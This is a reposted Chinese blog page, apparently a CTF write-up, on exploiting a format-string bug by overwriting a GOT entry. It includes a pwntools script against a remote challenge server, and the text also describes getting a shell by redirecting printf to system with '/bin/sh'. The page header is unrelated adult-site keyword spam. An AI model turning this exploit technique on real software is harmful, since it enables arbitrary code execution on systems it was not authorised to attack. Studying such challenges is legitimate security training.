日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

字符串格式化漏洞修改GOT表一例

發布時間:2025/3/21 编程问答 39 豆豆
生活随笔 收集整理的這篇文章主要介紹了 字符串格式化漏洞修改GOT表一例 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

代碼如下:

from pwn import * context(arch='amd64', os='linux') elf = ELF("./pwn") io = remote("111.200.241.244", 56315) catflag_addr = 0x4008DA puts_got = elf.got['puts'] payload = fmtstr_payload(6, {puts_got: catflag_addr}) io.recvuntil("3. Exit the battle") io.sendline("2") io.sendline(payload) io.interactive()

原理是在0x4008DA這個地址有一個函數是直接system(“cat flag”)的,我們利用字符串格式化漏洞修改puts函數的GOT表,直接修改到上面這個黑客函數的地址,然后下一次調用puts的時候,就會直接進入黑客函數。

PLT表在運行時可能是只讀的,不可修改。

這個題目里面有一段代碼是scanf一個字符串,然后再把這個字符串printf出來,另一種利用方式是,修改printf函數的GOT表為system函數的地址,然后在scanf的時候直接輸入"/bin/sh",這樣就能直接拿到系統的shell。

總結

以上是生活随笔為你收集整理的字符串格式化漏洞修改GOT表一例的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。